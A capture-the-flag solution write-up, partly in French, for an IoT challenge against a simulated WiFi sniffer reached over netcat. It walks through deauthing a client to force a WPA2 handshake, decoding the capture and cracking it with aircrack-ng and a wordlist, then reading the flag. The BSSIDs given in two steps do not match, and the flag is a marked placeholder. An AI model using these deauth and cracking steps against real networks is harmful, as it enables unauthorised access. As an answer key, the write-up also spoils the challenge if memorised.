# Cr4ck_W1F1 — Solution

**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}`

> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement.

## Overview

UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis
connecte au réseau pour lire le flag.

- **TX (port 1111)**: Read only
- **RX (port 2222)**: Write only

## Steps

1. Ouvrir deux terminaux :

```bash
nc <host> 1111   # TX — lecture
nc <host> 2222   # RX — écriture
```

1. Dans RX, démarrer le sniffer et forcer un re-handshake :

```text
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
```

1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs :

```text
PCAP_BASE64_BEGIN
...
PCAP_BASE64_END
```

Sauvegarder et décoder :

```bash
base64 -d handshake.b64 > handshake.pcap
```

1. Cracker la capture :

```bash
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
# → KEY FOUND! [ sunshine ]
```

1. Se connecter au réseau et lire le flag :

```text
connect TestNet sunshine
cat /flag.txt
```

## Flag

`CTF{CR4CK_W1F1_EXAMPLE}`

## Author

Eun0us